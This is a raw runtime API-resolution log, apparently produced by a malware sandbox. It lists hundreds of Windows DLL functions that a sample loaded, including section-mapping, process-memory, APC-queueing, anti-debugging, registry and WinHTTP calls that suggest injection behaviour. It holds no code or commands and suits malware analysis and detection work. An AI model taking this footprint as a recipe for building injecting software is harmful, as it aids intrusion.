DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyA
DynamicLoader: ADVAPI32.dll/RegCreateKeyA
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptorA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegSetValueExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: SHELL32.dll/
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: SHELL32.dll/ShellExecuteExW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: USER32.dll/FindWindowA
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: kernel32.dll/Wow64EnableWow64FsRedirection
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: ADVAPI32.dll/SaferIdentifyLevel
DynamicLoader: ADVAPI32.dll/SaferComputeTokenFromLevel
DynamicLoader: ADVAPI32.dll/SaferCloseLevel
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/WriteProcessMemory
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: ntdll.dll/RtlNtStatusToDosError
DynamicLoader: ntdll.dll/NtUnmapViewOfSection
DynamicLoader: ntdll.dll/NtMapViewOfSection
DynamicLoader: ntdll.dll/memcpy
DynamicLoader: ntdll.dll/memset
DynamicLoader: ntdll.dll/ZwClose
DynamicLoader: ntdll.dll/NtCreateSection
DynamicLoader: ntdll.dll/mbstowcs
DynamicLoader: ntdll.dll/ZwOpenProcessToken
DynamicLoader: ntdll.dll/ZwOpenProcess
DynamicLoader: ntdll.dll/ZwQueryInformationToken
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/RtlFreeUnicodeString
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/RtlUpcaseUnicodeString
DynamicLoader: ntdll.dll/RtlUnwind
DynamicLoader: ntdll.dll/NtQueryVirtualMemory
DynamicLoader: SHLWAPI.dll/PathFindExtensionW
DynamicLoader: SHLWAPI.dll/PathFindFileNameW
DynamicLoader: SHLWAPI.dll/PathFindExtensionA
DynamicLoader: SHLWAPI.dll/StrRChrA
DynamicLoader: SHLWAPI.dll/StrChrA
DynamicLoader: SHLWAPI.dll/StrStrIA
DynamicLoader: SHLWAPI.dll/StrTrimW
DynamicLoader: SHLWAPI.dll/StrChrW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: SHLWAPI.dll/PathCombineW
DynamicLoader: SETUPAPI.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: SETUPAPI.dll/SetupDiEnumDeviceInfo
DynamicLoader: SETUPAPI.dll/SetupDiGetDeviceRegistryPropertyA
DynamicLoader: SETUPAPI.dll/SetupDiGetClassDevsA
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/lstrcmpiW
DynamicLoader: kernel32.dll/lstrcatW
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CreateWaitableTimerA
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/SetWaitableTimer
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/HeapDestroy
DynamicLoader: kernel32.dll/GetCommandLineW
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/CreateEventA
DynamicLoader: kernel32.dll/GetVersion
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/GetTempPathA
DynamicLoader: kernel32.dll/GetTempFileNameA
DynamicLoader: kernel32.dll/CreateDirectoryA
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/FreeLibrary
DynamicLoader: kernel32.dll/lstrcpynA
DynamicLoader: kernel32.dll/GetFileTime
DynamicLoader: kernel32.dll/FindNextFileA
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/FindFirstFileA
DynamicLoader: kernel32.dll/CompareFileTime
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/lstrcmpiA
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/GetModuleHandleW
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/TerminateThread
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/VirtualProtectEx
DynamicLoader: kernel32.dll/SuspendThread
DynamicLoader: kernel32.dll/ResumeThread
DynamicLoader: kernel32.dll/GetLongPathNameW
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsA
DynamicLoader: kernel32.dll/lstrcatA
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/SetEndOfFile
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/FlushFileBuffers
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: USER32.dll/DefWindowProcW
DynamicLoader: USER32.dll/SendMessageW
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/CreateWindowExW
DynamicLoader: USER32.dll/SetWindowLongW
DynamicLoader: USER32.dll/SetClassLongW
DynamicLoader: USER32.dll/SystemParametersInfoW
DynamicLoader: USER32.dll/GetAncestor
DynamicLoader: USER32.dll/GetWindowLongW
DynamicLoader: USER32.dll/RegisterClassExW
DynamicLoader: USER32.dll/GetForegroundWindow
DynamicLoader: USER32.dll/TranslateMessage
DynamicLoader: USER32.dll/GetMessageW
DynamicLoader: USER32.dll/keybd_event
DynamicLoader: USER32.dll/DestroyWindow
DynamicLoader: USER32.dll/wsprintfW
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: USER32.dll/DispatchMessageW
DynamicLoader: USER32.dll/GetCursorInfo
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/RegDeleteValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExA
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetSidSubAuthorityCount
DynamicLoader: ADVAPI32.dll/GetSidSubAuthority
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyA
DynamicLoader: ADVAPI32.dll/RegCreateKeyA
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptorA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegSetValueExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: SHELL32.dll/
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: SHELL32.dll/ShellExecuteExW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: USER32.dll/FindWindowA
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: kernel32.dll/Wow64EnableWow64FsRedirection
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64ReadVirtualMemory64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ntdll.dll/ZwQueryInformationToken
DynamicLoader: ntdll.dll/ZwOpenProcess
DynamicLoader: ntdll.dll/ZwClose
DynamicLoader: ntdll.dll/ZwOpenProcessToken
DynamicLoader: ntdll.dll/strcpy
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/NtResumeProcess
DynamicLoader: ntdll.dll/RtlNtStatusToDosError
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtSuspendProcess
DynamicLoader: ntdll.dll/memcpy
DynamicLoader: ntdll.dll/NtMapViewOfSection
DynamicLoader: ntdll.dll/_snprintf
DynamicLoader: ntdll.dll/_wcsupr
DynamicLoader: ntdll.dll/_strupr
DynamicLoader: ntdll.dll/memmove
DynamicLoader: ntdll.dll/wcscpy
DynamicLoader: ntdll.dll/memset
DynamicLoader: ntdll.dll/ZwQueryKey
DynamicLoader: ntdll.dll/RtlFreeUnicodeString
DynamicLoader: ntdll.dll/RtlUpcaseUnicodeString
DynamicLoader: ntdll.dll/wcstombs
DynamicLoader: ntdll.dll/RtlImageNtHeader
DynamicLoader: ntdll.dll/RtlAdjustPrivilege
DynamicLoader: ntdll.dll/mbstowcs
DynamicLoader: ntdll.dll/NtUnmapViewOfSection
DynamicLoader: ntdll.dll/NtCreateSection
DynamicLoader: ntdll.dll/sprintf
DynamicLoader: ntdll.dll/wcscat
DynamicLoader: ntdll.dll/__C_specific_handler
DynamicLoader: ntdll.dll/__chkstk
DynamicLoader: kernel32.dll/lstrcpynA
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/TerminateThread
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/GetModuleHandleW
DynamicLoader: kernel32.dll/GetComputerNameW
DynamicLoader: kernel32.dll/VirtualProtectEx
DynamicLoader: kernel32.dll/FileTimeToLocalFileTime
DynamicLoader: kernel32.dll/QueueUserWorkItem
DynamicLoader: kernel32.dll/SystemTimeToFileTime
DynamicLoader: kernel32.dll/GetFileTime
DynamicLoader: kernel32.dll/FindNextFileA
DynamicLoader: kernel32.dll/FindFirstFileA
DynamicLoader: kernel32.dll/CompareFileTime
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsA
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/GetLocalTime
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/lstrcatA
DynamicLoader: kernel32.dll/CreateDirectoryA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/RemoveDirectoryA
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/DeleteFileA
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/HeapReAlloc
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/HeapDestroy
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/SetWaitableTimer
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/GetCurrentThread
DynamicLoader: kernel32.dll/GetSystemTimeAsFileTime
DynamicLoader: kernel32.dll/GetWindowsDirectoryA
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateEventA
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcmpiW
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/lstrcatW
DynamicLoader: kernel32.dll/GetCurrentThreadId
DynamicLoader: kernel32.dll/DuplicateHandle
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/GetTempPathA
DynamicLoader: kernel32.dll/SuspendThread
DynamicLoader: kernel32.dll/ResumeThread
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/SwitchToThread
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/MapViewOfFile
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/LeaveCriticalSection
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/lstrcmpiA
DynamicLoader: kernel32.dll/EnterCriticalSection
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: kernel32.dll/OpenWaitableTimerA
DynamicLoader: kernel32.dll/OpenMutexA
DynamicLoader: kernel32.dll/WaitForMultipleObjects
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/CreateWaitableTimerA
DynamicLoader: kernel32.dll/InitializeCriticalSection
DynamicLoader: kernel32.dll/UnregisterWait
DynamicLoader: kernel32.dll/TlsGetValue
DynamicLoader: kernel32.dll/LoadLibraryExW
DynamicLoader: kernel32.dll/TlsSetValue
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/RegisterWaitForSingleObject
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/TlsAlloc
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/WideCharToMultiByte
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/CreateFileMappingA
DynamicLoader: kernel32.dll/OpenFileMappingA
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/Thread32First
DynamicLoader: kernel32.dll/Thread32Next
DynamicLoader: kernel32.dll/QueueUserAPC
DynamicLoader: kernel32.dll/OpenThread
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/CallNamedPipeA
DynamicLoader: kernel32.dll/WaitNamedPipeA
DynamicLoader: kernel32.dll/ConnectNamedPipe
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetOverlappedResult
DynamicLoader: kernel32.dll/DisconnectNamedPipe
DynamicLoader: kernel32.dll/FlushFileBuffers
DynamicLoader: kernel32.dll/CreateNamedPipeA
DynamicLoader: kernel32.dll/CancelIo
DynamicLoader: kernel32.dll/GetSystemTime
DynamicLoader: kernel32.dll/RemoveVectoredExceptionHandler
DynamicLoader: kernel32.dll/SleepEx
DynamicLoader: kernel32.dll/AddVectoredExceptionHandler
DynamicLoader: kernel32.dll/OpenEventA
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/FreeLibrary
DynamicLoader: kernel32.dll/RaiseException
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/FileTimeToSystemTime
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetVersion
DynamicLoader: kernel32.dll/DeleteCriticalSection
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/RemoveDirectoryW
DynamicLoader: kernel32.dll/GetTempFileNameA
DynamicLoader: kernel32.dll/SetEndOfFile
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/SetFilePointerEx
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptorA
DynamicLoader: SHLWAPI.dll/StrRChrA
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: ADVAPI32.dll/GetUserNameA
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: ADVAPI32.dll/RegOpenKeyA
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: SHLWAPI.dll/StrToIntExA
DynamicLoader: SHLWAPI.dll/StrChrA
DynamicLoader: SHLWAPI.dll/StrTrimA
DynamicLoader: WINHTTP.dll/WinHttpOpen
DynamicLoader: WINHTTP.dll/WinHttpConnect
DynamicLoader: WINHTTP.dll/WinHttpOpenRequest
DynamicLoader: WINHTTP.dll/WinHttpQueryOption
DynamicLoader: WINHTTP.dll/WinHttpSetOption
DynamicLoader: WINHTTP.dll/WinHttpSendRequest
DynamicLoader: WS2_32.dll/GetAddrInfoW
DynamicLoader: WS2_32.dll/WSASocketW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/FreeAddrInfoW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSARecv
DynamicLoader: WS2_32.dll/WSASend
DynamicLoader: WINHTTP.dll/WinHttpReceiveResponse
DynamicLoader: schannel.DLL/SpUserModeInitialize
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: secur32.dll/FreeContextBuffer
DynamicLoader: ncrypt.dll/SslOpenProvider
DynamicLoader: ncrypt.dll/GetSChannelInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/SslIncrementProviderReferenceCount
DynamicLoader: ncrypt.dll/SslImportKey
DynamicLoader: bcryptprimitives.dll/GetCipherInterface
DynamicLoader: ncrypt.dll/SslLookupCipherSuiteInfo
DynamicLoader: USER32.dll/LoadStringW
DynamicLoader: ncrypt.dll/BCryptOpenAlgorithmProvider
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/BCryptGetProperty
DynamicLoader: ncrypt.dll/BCryptCreateHash
DynamicLoader: ncrypt.dll/BCryptHashData
DynamicLoader: ncrypt.dll/BCryptFinishHash
DynamicLoader: ncrypt.dll/BCryptDestroyHash
DynamicLoader: CRYPT32.dll/CertGetCertificateChain
DynamicLoader: USERENV.dll/GetUserProfileDirectoryW
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: sechost.dll/ConvertStringSidToSidW
DynamicLoader: USERENV.dll/RegisterGPNotification
DynamicLoader: GPAPI.dll/RegisterGPNotificationInternal
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: sechost.dll/QueryServiceConfigW
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: SensApi.dll/IsNetworkAlive
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: setupapi.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: Cabinet.dll/
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptSetHashParam
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptVerifySignatureA
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/QueryServiceConfigA
DynamicLoader: sechost.dll/QueryServiceStatus
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeA
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingA
DynamicLoader: RPCRT4.dll/RpcEpResolveBinding
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: RPCRT4.dll/RpcStringFreeA
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: setupapi.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: Cabinet.dll/
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: WINHTTP.dll/WinHttpOpen
DynamicLoader: WINHTTP.dll/WinHttpSetTimeouts
DynamicLoader: WINHTTP.dll/WinHttpSetOption
DynamicLoader: WINHTTP.dll/WinHttpCrackUrl
DynamicLoader: WINHTTP.dll/WinHttpConnect
DynamicLoader: WINHTTP.dll/WinHttpOpenRequest
DynamicLoader: WINHTTP.dll/WinHttpGetDefaultProxyConfiguration
DynamicLoader: WINHTTP.dll/WinHttpGetIEProxyConfigForCurrentUser
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: cryptbase.dll/SystemFunction036
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: NSI.dll/NsiAllocateAndGetTable
DynamicLoader: CFGMGR32.dll/CM_Open_Class_Key_ExW
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: NSI.dll/NsiFreeTable
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: WINHTTP.dll/WinHttpGetProxyForUrl
DynamicLoader: WINHTTP.dll/WinHttpTimeFromSystemTime
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: WINHTTP.dll/WinHttpSendRequest
DynamicLoader: WINHTTP.dll/WinHttpReceiveResponse
DynamicLoader: WINHTTP.dll/WinHttpQueryHeaders
DynamicLoader: SHLWAPI.dll/StrStrIW
DynamicLoader: WINHTTP.dll/WinHttpQueryDataAvailable
DynamicLoader: WINHTTP.dll/WinHttpReadData
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: cryptnet.dll/I_CryptNetSetUrlCacheFlushInfo
DynamicLoader: setupapi.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: Cabinet.dll/
DynamicLoader: bcryptprimitives.dll/GetAsymmetricEncryptionInterface
DynamicLoader: ncrypt.dll/BCryptImportKeyPair
DynamicLoader: ncrypt.dll/BCryptVerifySignature
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/BCryptDestroyKey
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: WINHTTP.dll/WinHttpSetStatusCallback
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: setupapi.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
